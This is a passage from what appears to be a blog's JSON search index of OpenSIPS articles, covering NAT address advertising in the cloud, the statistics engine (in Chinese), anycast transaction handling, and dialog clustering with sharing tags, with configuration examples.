opensips[17835]: WARNING:core:log_expiry: #1 is a module action : match_dialog – 220329us – line 1146 opensips[17835]: WARNING:core:log_expiry: #2 is a module action : t_relay – 3370us – line 1574 opensips[17835]: WARNING:core:log_expiry: #3 is a module action : unforce_rtp_proxy – 3297us – line 1625 opensips[17835]: WARNING:core:log_expiry: #4 is a core action : 78 – 24us – line 1188 opensips[17835]: WARNING:core:log_expiry: #5 is a module action : subst_uri – 8us – line 1201\nGood luck with the troubleshooting and be sure your OpenSIPS rocks !!\n","permalink":"https://wdd.js.org/opensips/blog/troubleshooting-opensips-script/","summary":"What makes OpenSIPS such an attractive and powerful SIP solution is its high level of programmability, thanks to its C-like configuration script. But once you get into the “programming” area, you will automatically need tools and skills for troubleshooting.So here are some tips and tools you can use in OpenSIPS for “debugging” your configuration script.\nControlling the script logging The easiest way to troubleshoot your script is of course by using the xlog() core function and print your own messages.","title":"Troubleshooting OpenSIPS script"},{"content":"Cloud computing is a more and more viable option for running and providing SIP services. The question is how compatible are the SIP services with the Cloud environment ? So let’s have a look at this compatibility from the most sensitive (for SIP protocol) perspective – the IP network topology.A large number of existing clouds (like EC2, Google CP, Azure) have a particularity when it comes to the topology of the IP network they provide – they do not provide public routable IPs directly on the virtual servers, rather they provide private IPs for the servers and a fronting public IP doing a 1-to-1 NAT to the private one.Such a network topology forces you to run the SIP service behind a NAT. Why is this such a bad thing? 
Because, unlike other protocols (such as HTTP), SIP is very intimate with the IP addresses – the IPs are part of the SIP messages and used for routing. So, a SIP server running on a private IP advertises its listening IP address (the private one) in the SIP traffic – this will completely break the SIP routing, both at transaction and dialog level :\ntransaction level – when sending a SIP request, the SIP server will construct the Via SIP header using its listening IP, so the private IP. But the information from the Via header is used by the receiver of the SIP request in order to route back the SIP replies. And routing to a private IP (from the public Internet) is mission impossible; dialog level – in a similar way, when sending an INVITE request, the SIP server will advertise in its Contact SIP header the private IP, so the other SIP party will not be able to send any sequential request back to our server. So, how can OpenSIPS help you to run SIP services in the Cloud ?\nRunning OpenSIPS behind NAT OpenSIPS implements a smart mechanism of separating the IPs used at network level (as listeners) and the IPs inside the SIP messages.The “advertise” mechanism gives you full control of what IP is presented (or advertised) in the SIP messages, regardless of what IP is used for the networking communication. 
In short, you can have OpenSIPS sending a SIP request from the 10.0.0.15 private IP address, but using inside the message (as Via, Contact or Route) a totally different IP.When advertising a different IP (than the network layer), the following parts of the SIP message will be affected:\nthe introduced Via header (if a SIP request) the introduced Record-Route header (if a SIP request) the introduced Contact header OpenSIPS has a very flexible way to control the advertised IP, at different levels: global, per listening interface or per SIP transaction\nGlobal Advertising Such advertising will affect the entire traffic handled by OpenSIPS, automatically, without any additional action in the actual routing script. This setting is achieved via the advertised_address global parameter:advertised_address=\u0026ldquo;12.34.56.78\u0026rdquo;\nPer Interface Advertising For more complex scenarios when using multiple listening interfaces, you can opt for a different advertised IP for each listener. Some listener may be bound to the NATed IP address, so you want to do advertising, some other listener may be bound to a private IP used only inside the private network, so you want no advertising.listen = udp:10.0.0.34:5060 as 99.88.44.33:5060 listen = udp:10.0.0.36:5060 All the SIP traffic routed through such an advertising interface will be automatically modified. 
The only thing you have to do is to be sure you properly control the usage of interfaces when you route your SIP traffic – usually switching to a different interface, by using the force_send_socket() script function.\nPer Transaction Advertising The finest granularity OpenSIPS offers for controlling the advertising IP is at SIP transaction level – that is, for each transaction (a SIP request and all its replies) you can choose what should be the advertised IP.Such control is done via the routing script – when routing the SIP requests, you can enforce a value to be advertised for its transaction: set_advertised_address( 12.34.56.78 );As a small but important note : advertising a different IP identity may act as a boomerang – your OpenSIPS may be required to recognize itself based on an IP you previously advertised. Like the IP advertised in an INVITE request in the Record-Route header must be recognized by OpenSIPS as “its own IP” later, when receiving a sequential request like ACK or BYE and inspecting the Route header.If for the global and per-interface advertising OpenSIPS is automatically able to recognize its own advertised IP’s, for the per-transaction level it cannot. So you have to explicitly take care of that and teach OpenSIPS about the IP’s you plan to advertise by using the alias core parameter.\nRunning RTPproxy behind NAT So far we covered the OpenSIPS related part. But in many SIP scenarios you may be required to handle the media/RTP too, for cases like call recording, media pinning, DTMF sniffing or others.So, you may end up with the need of running RTPproxy behind a 1-to-1 NAT. Fortunately things are much simpler here. The nature of the 1-to-1 NAT takes care of the port mapping between the public NAT IP and the private IP. 
The only thing you have to do is to advertise the public IP in the SIP SDP, while keeping RTPproxy operating on the private IP.To get this done, when using one of the RTPproxy related functions like rtpproxy_engage(), rtpproxy_answer() or rtpproxy_offer(), simply use the second parameter of these functions to overwrite (in the SDP) the IP received from RTPproxy with the IP you want to advertise:rtpproxy_engage(\u0026ldquo;co\u0026rdquo;,\u0026ldquo;23.45.67.89\u0026rdquo;);This will result in having the 23.45.67.89 IP advertised in the SDP, rather than the IP RTPproxy is running on. And no other change is required in the actual RTPproxy configuration.\nWhat’s next ? What we covered so far here is a relatively simple scenario, still it is the most used one – an OpenSIPS behind NAT serving SIP clients on the public Internet.But things are getting more complicated and interesting when you also want to offer media services (like voicemail) or you want to support SIP clients from both public and private networks – and these are the topics for some future posts on this matter.\n","permalink":"https://wdd.js.org/opensips/blog/runing-opensips-in-cloud/","summary":"Cloud computing is a more and more viable option for running and providing SIP services. The question is how compatible are the SIP services with the Cloud environment ? So let’s have a look at this compatibility from the most sensitive (for SIP protocol) perspective – the IP network topology.A large number of existing clouds (like EC2, Google CP, Azure) have a particularity when it comes to the topology of the IP network they provide – they do not provide public routable IPs directly on the virtual servers, rather they provide private IPs for the servers and a fronting public IP doing a 1-to-1 NAT to the private one.","title":"Running OpenSIPS in the Cloud"},{"content":"无论你是经验丰富的OpenSIPS管理员,或者你仅仅想找到为什么ACK消息在你的网络中循环发送,唯一可以确定的是:我们或早或晚会需要OpenSIPS提供数据来回答以下问题\nOpenSIPS运行了多久? 我们是否被恶意流量攻击了? 
我们的平台处理了多少个来自运营商的无效SIP包 在流量峰值时,OpenSIPS是否拥有足够的内存来支撑运行 \u0026hellip; 幸运的是,OpenSIPS提供内置的统计支持,来方便我们快速解决以上问题。详情可以查看OpenSIPS统计接口。在本篇文章中,我们将会了解统计引擎,但是,什么是引擎?\n统计引擎 总的来说,下图就是OpenSIPS引擎的样子。\n统计引擎内置于OpenSIPS。它管理所有的统计数据,并且暴露一个标准的CRUD操作接口给所有的模块,让模块可以推送或者管理他们自己的统计数据。\n以下有三种方式来和统计引擎进行交互\n直接通过脚本访问。如通过$script(my-stat)变量 使用HTTP请求来访问 使用opensipsctl fifo命令 统计引擎是非常灵活并且可以通过不同方式与其交互,那么它怎么能让我们的使用变得方便呢?下面的一些建议,能够让你全面地发挥统计引擎的能力,来增强某些重要的层面。\n系统开发维护 当你处理OpenSIPS的DevOps时,你经常需要监控OpenSIPS的一些运行参数。你的关注点不同,那么你就需要监控不同的方面,例如SIP事务、对话、内存使用、系统负载等等\n下面是OpenSIPS统计分组的一个概要,以及组内的每一个统计值,详情可以参考wiki。\n统计简介 假如我们想通过sipp对我们的平台进行流量测试,我们想在压测期间观测当前的事务、对话、共享内存的值变化。或者我们有了一个新的SIP提供商,他们每天早上9点会开始向我们平台推送数据,我们需要监控他们的推送会对我们系统产生的影响。\n你可以在OpenSIPS实例中输入以下指令:\nwatch -n0.2 \u0026#39;opensipsctl fifo get_statistics inuse_transactions dialog: shmem:\u0026#39; 注意 get_statistics命令既可以接受一个统计值项,也可以接受一个统计组的项。统计组都是以冒号(:)结尾。\n与递增的统计指标进行交互 统计指标看起来相同,实际上分为两类\n累计值。累计值一般是随着时间增长,例如rcv_requests, processed_dialogs,表示从某个时间点开始累计收到或者处理了多少个任务 计算值。计算值一般和系统运行负载有关,和时间无关。例如active_dialogs, real_used_size, 这些值都是由内部函数计算出来的计算值 一般来说,脚本中定义的统计值都是递增的,OpenSIPS无法重新计算它,只能我们自己来计算或者维护它的值。\n以下方式可以快速查看计算值类的统计项\nopensipsctl fifo list_statistics 某些场景,你可能需要周期性地重置累计值类的统计项。例如你可能只需要统计当天的processed_dialogs,daily_routed_minutes,那么你只需要设置一个定时任务,每天0点,重置这些统计值。\nopensipsctl fifo reset_statistics processed_dialogs 在脚本中自定义统计项 在脚本中自定义统计项是非常简单的,只需要做两步\n加载statistics.so模块 在某些位置调用函数, update_stat(\u0026quot;daily_routed_minutes\u0026quot;, \u0026quot;+1\u0026quot;) 实战:脚本中有许多的自定义统计项 统计每天收到的SIP消息的请求方式, 以及处理的消息长度 每隔24小时,以JSON的形式,将统计数据推送到Web服务器 # 设置统计组 modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_groups\u0026#34;, \u0026#34;method, packet\u0026#34;) # 请求路由 route { ... update_stat(\u0026#34;method:$rm\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:count\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:total_size\u0026#34;, \u0026#34;$ml\u0026#34;) # message length ... 
} # 响应路由 onreply_route { update_stat(\u0026#34;packet:count\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:total_size\u0026#34;, \u0026#34;$ml\u0026#34;) } # 定时器路由,定时通过HTTP发请求 timer_route [daily_stat_push, 86400] { $json(all_stats) := \u0026#34;{\\\u0026#34;method\\\u0026#34;: {}, \\\u0026#34;packet\\\u0026#34;: {}}\u0026#34;; # pack and clear all method-related statistics stat_iter_init(\u0026#34;method\u0026#34;, \u0026#34;iter\u0026#34;); while (stat_iter_next(\u0026#34;$var(key)\u0026#34;, \u0026#34;$var(val)\u0026#34;, \u0026#34;iter\u0026#34;)) { $json(all_stats/method/$var(key)) = $var(val); reset_stat(\u0026#34;$var(key)\u0026#34;); } # pack and clear all packet-related statistics stat_iter_init(\u0026#34;packet\u0026#34;, \u0026#34;iter\u0026#34;); while (stat_iter_next(\u0026#34;$var(key)\u0026#34;, \u0026#34;$var(val)\u0026#34;, \u0026#34;iter\u0026#34;)) { $json(all_stats/packet/$var(key)) = $var(val); reset_stat(\u0026#34;$var(key)\u0026#34;); } # push the data to our web server if (!rest_post(\u0026#34;https://WEB_SERVER\u0026#34;, \u0026#34;$json(all_stats)\u0026#34;, , \u0026#34;$var(out_body)\u0026#34;, , \u0026#34;$var(status)\u0026#34;)) xlog(\u0026#34;ERROR: during HTTP POST, $json(all_stats)\\n\u0026#34;); if ($var(status) != 200) xlog(\u0026#34;ERROR: web server returned $var(status), $json(all_stats)\\n\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/blog/deepin-stat-engine/","summary":"无论你是经验丰富的OpenSIPS管理员,或者你仅仅想找到为什么ACK消息在你的网络中循环发送,唯一可以确定的是:我们或早或晚会需要OpenSIPS提供数据来回答以下问题\nOpenSIPS运行了多久? 我们是否被恶意流量攻击了? 
我们的平台处理了多少个来自运营商的无效SIP包 在流量峰值时,OpenSIPS是否拥有足够的内存来支撑运行 \u0026hellip; 幸运的是,OpenSIPS提供内置的统计支持,来方便我们快速解决以上问题。详情可以查看OpenSIPS统计接口。在本篇文章中,我们将会了解统计引擎,但是,什么是引擎?\n统计引擎 总的来说,下图就是OpenSIPS引擎的样子。\n统计引擎内置于OpenSIPS。它管理所有的统计数据,并且暴露一个标准的CRUD操作接口给所有的模块,让模块可以推送或者管理他们自己的统计数据。\n以下有三种方式来和统计引擎进行交互\n直接通过脚本访问。如通过$script(my-stat)变量 使用HTTP请求来访问 使用opensipsctl fifo命令 统计引擎是非常灵活并且可以通过不同方式与其交互,那么它怎么能让我们的使用变得方便呢?下面的一些建议,能够让你全面地发挥统计引擎的能力,来增强某些重要的层面。\n系统开发维护 当你处理OpenSIPS的DevOps时,你经常需要监控OpenSIPS的一些运行参数。你的关注点不同,那么你就需要监控不同的方面,例如SIP事务、对话、内存使用、系统负载等等\n下面是OpenSIPS统计分组的一个概要,以及组内的每一个统计值,详情可以参考wiki。\n统计简介 假如我们想通过sipp对我们的平台进行流量测试,我们想在压测期间观测当前的事务、对话、共享内存的值变化。或者我们有了一个新的SIP提供商,他们每天早上9点会开始向我们平台推送数据,我们需要监控他们的推送会对我们系统产生的影响。\n你可以在OpenSIPS实例中输入以下指令:\nwatch -n0.2 \u0026#39;opensipsctl fifo get_statistics inuse_transactions dialog: shmem:\u0026#39; 注意 get_statistics命令既可以接受一个统计值项,也可以接受一个统计组的项。统计组都是以冒号(:)结尾。\n与递增的统计指标进行交互 统计指标看起来相同,实际上分为两类\n累计值。累计值一般是随着时间增长,例如rcv_requests, processed_dialogs,表示从某个时间点开始累计收到或者处理了多少个任务 计算值。计算值一般和系统运行负载有关,和时间无关。例如active_dialogs, real_used_size, 这些值都是由内部函数计算出来的计算值 一般来说,脚本中定义的统计值都是递增的,OpenSIPS无法重新计算它,只能我们自己来计算或者维护它的值。\n以下方式可以快速查看计算值类的统计项\nopensipsctl fifo list_statistics 某些场景,你可能需要周期性地重置累计值类的统计项。例如你可能只需要统计当天的processed_dialogs,daily_routed_minutes,那么你只需要设置一个定时任务,每天0点,重置这些统计值。\nopensipsctl fifo reset_statistics processed_dialogs 在脚本中自定义统计项 在脚本中自定义统计项是非常简单的,只需要做两步\n加载statistics.so模块 在某些位置调用函数, update_stat(\u0026quot;daily_routed_minutes\u0026quot;, \u0026quot;+1\u0026quot;) 实战:脚本中有许多的自定义统计项 统计每天收到的SIP消息的请求方式, 以及处理的消息长度 每隔24小时,以JSON的形式,将统计数据推送到Web服务器 # 设置统计组 modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_groups\u0026#34;, \u0026#34;method, packet\u0026#34;) # 请求路由 route { ... 
update_stat(\u0026#34;method:$rm\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:count\u0026#34;, \u0026#34;+1\u0026#34;); update_stat(\u0026#34;packet:total_size\u0026#34;, \u0026#34;$ml\u0026#34;) # message length .","title":"深入OpenSIPS统计引擎"},{"content":"The advantages of doing Load Balancing and High Availability **without** any particular requirements from the client side are starting to make Anycast IPs more and more appealing in the VoIP world. But are you actually getting the best out of it? This article describes how you can use OpenSIPS 2.4 to make the best use of an anycast environment.Anycast is a UDP-based special network setup where a single IP is assigned to multiple nodes, each of them being able to actively use it (as opposed to a VRRP setup, where only one instance can use the IP). When a packet reaches the network with an anycast destination, the router sends it to the “closest” node, based on different metrics (application status, network latency, etc). This behavior ensures that traffic is (1) balanced by sending it to one of the least busy nodes (based on application status) and also ensures (2) geo-distribution, by sending the request to the closest node (based on latency). Moreover, if a node goes down, it will be completely put out of route, ensuring (3) high availability for your platform. All these features without any special requirements from your customers, all they need is to send traffic to the anycast IP.Sounds wonderful, right? It really is! And if you are using anycast IPs in a transaction-stateless mode, things just work out of the box.\nState of the art A common Anycast setup is to assign the anycast IPs to the nodes at the edge of your platform, facing the clients. This setup ensures that all three features (load balancing, geo-distribution and high-availability) are provided for your customers’ inbound calls. 
However, most of the anycast “stories” we have heard or read about are only using the anycast IP for the initial incoming INVITEs from customers. Once received, the entire call is pinned to a unicast IP of the first server that received the INVITE. Therefore all sequential messages will go through that single unicast IP. Although this works fine from a SIP point of view, you will lose all the anycast advantages such as high-availability.When using this approach (of only receiving the initial request on the anycast IP) the inbound calls to the clients will also be affected, because besides losing dialog high-availability, you will also need to ask all your clients to accept calls from all your available unicast IPs. Imagine what happens when you add a new node.Our full anycast solution aims to sort out these limitations by always keeping the anycast IPs in the route for the entire call. This means that your clients will always have one single IP to provision, the anycast IP. And when a node goes down, all sequential messages will be re-routed (by the router) to the next available node. Of course, this node needs to have the entire call information to be able to properly close the call, but that can be easily done in OpenSIPS using dialog replication.Besides the previous issue, most of the time running in stateless mode is not possible due to application logic constraints (re-transmission handling, upstream timeout detection, etc.). Thus stateful transaction mode is required, which complicates our anycast scenario a bit more.\nAnycast in a transaction stateful scenario A SIP transaction consists of a request and all the replies associated with that request. According to the SIP RFC, when a stateful SIP proxy sends a request, the next hop should immediately send a reply as soon as it receives the request. Otherwise, the SIP proxy will start re-transmitting that request until it either receives a reply or eventually times out. 
Now, let’s consider the anycast scenario described in Figure 1: Figure 1.OpenSIPS instance 1 sends an INVITE to the client, originated from the Anycast IP interface. The INVITE goes through the Router, and reaches the Client’s IP. However, when the Client replies with 200 OK, the Router decides the “shortest” path is to OpenSIPS instance 2, which has no information about the transaction. Therefore, instance 2 drops all the replies. Moreover, since instance 1 did not receive any reply, it will start re-transmitting the INVITE. And so on, and so forth, until instance 1 times out, because it did not receive any reply, and the Client times out because there was no ACK received for its replies. Therefore the call is unable to complete.To overcome this behavior, we have developed a new mechanism that is able to handle transactions in such distributed environments. The following section describes how this is done.\nDistributed transactions handling Transactions are probably the most complicated structures in SIP, especially because they are very dynamic (requests and replies are exchanged within milliseconds) and they contain a lot of data (various information from the SIP messages, requests for re-transmissions, received replies, multiple branches, etc). That makes them very hard to move around between different instances. Therefore, instead of sending transaction information to each node within the anycast “cluster”, our approach was to bring the events to the node that created the transaction. 
This way we minimize the amount of data exchanged between instances – instead of sending huge transaction data, we simply replicate one single message – and we are only doing this when it’s really necessary – we are only replicating messages when the router that manages the anycast config switches to a different node.When doing distributed transaction handling, the logic of the transaction module is the following: when a reply comes on one server, we check whether the current node has a transaction for that reply. If it does (i.e. the router did not switch the path), the reply is processed locally. If it does not, then somebody else must “own” that transaction. The question is who? That’s where the SIP magic comes in: when we generate the INVITE request towards the client, we add a special parameter in the Via header, indicating the ID of the node that created the transaction. When the reply comes back, that ID contains exactly the node that “owns” the transaction. Therefore, all we have to do is to take that ID and forward the message to it, using the proto_bin module. When the “owner” receives the reply, it “sees” it exactly as it would have received it directly from the client, thus treating it exactly as any other regular reply. And the call is properly established further. Figure 2. There is one more scenario that needs to be taken into account, namely what happens when a CANCEL message reaches a different node (Figure 2). Since there is no transaction found on node 2, normally that message would have been declined. However, in an anycast environment, the transaction might be “owned” by a different node; therefore, we need to instruct it that the transaction was canceled. However, this time we have no information about who “owns” that transaction – so all we can do is to broadcast the CANCEL event to all the nodes within the cluster. 
If any of the nodes that receive the event find the transaction that the CANCEL refers to, it will properly reply a 200 OK message and then close all the ongoing branches. If no transaction is found on any node, the CANCEL will eventually time out on the Client side.A similar approach is done for a hop-by-hop ACK message received in an anycast interface.\nAnycast Configuration The first thing we have to do is to configure the anycast address on each node that uses it. This is done in the listen parameter:\nlisten = udp:10.10.10.10:5060 anycast The distributed transaction handling feature relies on the clusterer module to group the nodes that use the same anycast address in a cluster. The resulting cluster id has to be provisioned using the tm_replication_cluster parameter of the transaction module:\nloadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;tm_replication_cluster\u0026#34;, 1) The last thing that we need to take care of is the hop-by-hop messages, such as ACK. This is automatically done by using the t_anycast_replicate() function: if (!loose_route()) { if (is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; !t_check_trans()) { # transanction not here - replicate msg to other nodes t_anycast_replicate(); exit; } } Notice that the CANCEL is not treated in the snippet above. That is because CANCEL messages received on an anycast interface are automatically handled by the transaction layer as described in the previous section. However, if one intends to explicitly receive the CANCEL message in the script to make any adjustments (i.e. change the message Reason), they can disable the default behavior using the cluster_auto_cancel param. However, this changes the previous logic a bit, since the CANCEL must be replicated as well in case no transaction is locally found:\nmodparam(\u0026#34;tm\u0026#34;, \u0026#34;cluster_auto_cancel\u0026#34;, no) ... 
if (!loose_route()) { if (!t_check_trans()) { if (is_method(\u0026#34;CANCEL\u0026#34;)) { # do your adjustments here t_anycast_replicate(); exit; } else if (is_method(\u0026#34;ACK\u0026#34;)) { t_anycast_replicate(); exit; } } } And that’s it – you have a fully working anycast environment, with distributed transaction matching!\nFind out more! The distributed transaction handling mechanism has already been released on the OpenSIPS 2.4 development branch. To find out more about the design and internals of this feature, as well as other use cases, make sure you do not miss the Full Anycast support at the edge of your platform using OpenSIPS 2.4 presentation about this at the Amsterdam 2018 OpenSIPS Summit, May 1-4!\n","permalink":"https://wdd.js.org/opensips/blog/full-anycast/","summary":"The advantages of doing Load Balancing and High Availability **without** any particular requirements from the client side are starting to make Anycast IPs more and more appealing in the VoIP world. But are you actually getting the best out of it? This article describes how you can use OpenSIPS 2.4 to make the best use of an anycast environment.Anycast is a UDP-based special network setup where a single IP is assigned to multiple nodes, each of them being able to actively use it (as opposed to a VRRP setup, where only one instance can use the IP).","title":"Full Anycast support in OpenSIPS 2.4"},{"content":"Dialog replication in OpenSIPS has been around since version 1.10, when it became clear that sharing real-time data through a database is no longer feasible in a large VoIP platform. Further steps in this direction have been made in 2.2, with the advent of the clusterer module, which manages OpenSIPS instances and their inter-communication. But have we been able to achieve the objective of a true and complete solution for clustering dialog support? 
In this article we are going to look into the limitations of distributing ongoing calls in previous OpenSIPS versions and how we overcame them and added new possibilities in 2.4, based on the improved clustering engine.\nPrevious Limitations Up until this point, distributing ongoing dialogs essentially only consisted of sharing the relevant internal information with all other OpenSIPS instances in the cluster. To optimize the communication, whenever a new dialog is created (and confirmed) or an existing one is updated (state changes etc.), a binary message about that particular dialog is broadcasted.Limiting the data exchange to be driven by runtime events leaves an instance with no way of learning all the dialog information from the cluster when it boots up or at a particular moment in time. Consider what happens when we restart a backup OpenSIPS: any failover that we hope to be able to handle on that node will have to be delayed until it gets naturally in sync with the other node(s).But the more painful repercussion of just sharing data without any other distributed logic is the lack of a mechanism to coordinate certain data-related actions between the cluster nodes. For example, in a typical High-Availability setup with an active-passive node configuration, although all dialogs are duplicated to the passive node, the following must be performed exactly once:\ngenerate **BYE requests** and/or produce CDRs (Call Detail Records) upon dialog expiration; send Re-Invite or OPTIONS pings to end-points; send replication packets on dialog events; update the dialog database (if it is still used as a failsafe for binary replication, e.g. both nodes crash). 
Usage scenarios Before actually diving into how OpenSIPS 2.4 solves the aforementioned issues, let’s first see the most popular scenarios we considered when designing the dialog clustering support:\nActive – Backup setup for High Availability using Virtual IPs. The idea here would be to have a Virtual IP (or floating IP) facing the end-users. This IP will be automatically moved from a failed instance to a hot-backup server by tools like vrrpd, KeepaliveD, Heartbeat. Active – Active setup, or a double cross Active-Backup. This is a more “creative” approach using two Virtual IPs, each server being active for one of them and backup for the other, and still sharing all the dialogs, in order to handle both VIPs when a server fails. Anycast setup for Distributed calls (High Availability and Balancing). This relies on the newly added full support for Anycast introduced in OpenSIPS 2.4. You can find more details in the dedicated article. Dialog Clustering with OpenSIPS 2.4 The new dialog clustering support in OpenSIPS 2.4 addresses all the mentioned limitations by properly and fully covering the typical clustering scenarios. But first let’s see the newly introduced concepts in OpenSIPS 2.4 when it comes to clustering dialogs.\nData synchronization In order to address our first discussed issue, the improved clustering under-layer in OpenSIPS 2.4 offers the capability of synchronizing a freshly booted node with the complete data set from the cluster in a fast and transparent manner. This way, we can minimize the impact of restarting an OpenSIPS instance, or plugging a new node in the cluster on the fly, without needing any DB storage or having to accept the compromise of lost dialogs. 
We can also perform a sync at any time via an MI command, if for some reason the dialog data got desynchronized on a given instance.\nDialog ownership mechanism The other big improvement that OpenSIPS 2.4 introduces for distributing dialogs is the capability to precisely decide which node in the cluster is responsible for a dialog – responsible in the way of triggering certain actions for that dialog. This comes as a necessity because some of the dialogs are locally created on an instance, some are temporarily handled in place of a failed/inactive node and others are just kept as backup. As such, the concept of dialog “ownership” was introduced.The basic idea of this mechanism is that a single node in the dialog cluster (where all the calls are shared) is “responsible” at any time for a given dialog, in terms of taking actions for it. When the node owning the dialog goes down, another node becomes its owner and handles its actions.But how is this ownership concept concretely implemented in OpenSIPS 2.4?\nSharing tags In order to be able to establish an ownership relationship between the nodes and the dialog, we introduced the concept of tags or _“sharing tags”_ as we call them. Each dialog is marked with a single tag; on the other hand, a node is actively responsible for (owning) a tag (and indirectly all the dialogs marked with that tag). A tag may be present on several nodes, but only a single node sees the tag as active; the other nodes aware of that tag are seeing the tag in standby/backup mode.So each node may be aware of multiple sharing tags, each with an _active_ or backup state. Each tag can be defined with an implicit state at OpenSIPS startup or directly set at runtime and all this information is shared between the cluster nodes. When we set a sharing tag to active on a certain node, we are practically setting that node to become the owner of all its known dialogs that are marked with that particular tag. 
At the same time, if another node was active for the tag, it has to step down.To better understand this, we will briefly describe how the sharing tags should be used in the previously mentioned scenarios, considering a simple two-node cluster:\nin an active-backup cluster with a single VIP, we would only need a single sharing tag corresponding to the VIP address; the node that holds the VIP will also have the tag set to active and perform all the dialog related actions; in an active-active cluster with two VIPs, we would need two sharing tags, corresponding to each VIP, and whichever node holds the given VIP should have the appropriate tag set as active; in an anycast cluster setup, we will have one sharing tag corresponding to each node (because the dialog is tied to the node where it was first created, as opposed to an IP). If a node is up, it should have its corresponding tag active, otherwise any node can take the tag over. Configuration Setting up dialog replication in OpenSIPS 2.4 is very easy and, in the following, we will exemplify our discussed scenarios with the essential configuration:\n1. Active-backup setup Let’s use the tag named “vip” which will be configured via the dlg_sharing_tag module parameter. 
When starting OpenSIPS, you need to check the HA status of the node (by inspecting the HA system) and to decide which node will start as owner of the tag:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip=active\u0026rdquo;) if active, or: modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip=backup\u0026rdquo;) if standby.During runtime, depending on the change of the HA system, the tag may be moved (as active) to a different node by using MI commands (see following chapter).At script level, all we need to do, on each node, is to mark a newly created dialog with the sharing tag, using the set_dlg_sharing_tag() function:if (is_method(\u0026ldquo;INVITE\u0026rdquo;)) { create_dialog(); set_dlg_sharing_tag(\u0026ldquo;vip\u0026rdquo;);}\n2. Active-active setup Similar to the previous case, but we will use two tags, one for each VIP address. We will define the initial tag state for the first VIP, on the first node:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip1=active\u0026rdquo;)The second node will initially be responsible for the second VIP, so on node id 2 we will set:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;vip2=active\u0026rdquo;)Now, on each node, depending on which VIP we receive the initial Invite on, we mark the dialog appropriately:if (is_method(\u0026ldquo;INVITE\u0026rdquo;)) { create_dialog(); if ($Ri == 10.0.0.1 # VIP 1) set_dlg_sharing_tag(\u0026ldquo;vip1\u0026rdquo;); else if ($Ri == 10.0.0.2 # VIP 2) set_dlg_sharing_tag(\u0026ldquo;vip2\u0026rdquo;);}So, calls established via the VIP1 address will be marked with the “vip1” tag and handled by the node having the “vip1” tag as active – this will be node 1 in normal operation.The calls established via the VIP2 address will be marked with the “vip2” tag and handled by the node having the “vip2” tag as active 
– this will be node 2 in normal operation.If node 1 fails, the HA system will move VIP1 to active on node 2. Further, the HA system is responsible for instructing OpenSIPS running on node 2 that it has become the owner of the “vip1” tag as well, so node 2 will also start actively handling the calls marked with “vip1”.\n3. Anycast setup Each node has its own corresponding tag and it starts with the tag as active. So on node 1 we will have:modparam(\u0026ldquo;dialog\u0026rdquo;, \u0026ldquo;dlg_sharing_tag\u0026rdquo;, \u0026ldquo;node_1=active\u0026rdquo;)And on the second node, the same as above, but with “node_2=active”.Now, each node marks the dialogs with its own tag, for example on node 1:if (is_method(\u0026ldquo;INVITE\u0026rdquo;)) { create_dialog(); set_dlg_sharing_tag(\u0026ldquo;node_1\u0026rdquo;);}And, conversely, node 2 marks each created dialog with the “node_2” tag.If node 1 fails, the monitoring system (also responsible for the Anycast management and BGP updates) will pick one of the remaining nodes in the anycast group and activate the “node_1” tag on it. So, this new node will become the owner of, and responsible for, the calls created on former node 1.\nChanging sharing tags state All that remains to be discussed is how we can take over the ownership of the dialogs flagged with a certain sharing tag at runtime. This is of course the case when our chosen mechanism of node availability detects that a node in the cluster is down, or when we do a manual switch-over (e.g. for maintenance). For this purpose, all we have to do is issue the MI command dlg_set_sharing_tag_active, which sets a certain sharing tag to the active state.
For example, in the single VIP scenario, with a sharing tag named “vip”, after we have re-pointed the floating IP to the current machine, we would run:opensipsctl fifo dlg_set_sharing_tag_active vip\nConclusions The new dialog clustering support in OpenSIPS 2.4 is complete in the sense that it not only takes care of dialog replication/sharing, but also of dialog handling in terms of properly triggering dialog-specific actions.The implementation also tries to provide a consistent solution, by following and addressing the most common dialog clustering scenarios – these are real-world scenarios answering real-world needs.Even more, the work on the dialog clustering was consistently correlated with work on the Anycast support, so it will be an easy task for the user to build an integrated anycast setup taking care of both the transaction and dialog layers.Need more practical examples? Join us at the OpenSIPS Summit 2018 in Amsterdam and see the Interactive Demos about the clustering support in OpenSIPS 2.4.\n","permalink":"https://wdd.js.org/opensips/blog/cluster-call/","summary":"Dialog replication in OpenSIPS has been around since version 1.10, when it became clear that sharing real-time data through a database is no longer feasible in a large VoIP platform. Further steps in this direction have been made in 2.2, with the advent of the clusterer module, which manages OpenSIPS instances and their inter-communication. But have we been able to achieve the objective of a true and complete solution for clustering dialog support?","title":"Clustering ongoing calls with OpenSIPS 2.4"},{"content":"The distributed SIP user location support is one of the major features of the latest stable OpenSIPS release, namely 2.4. 
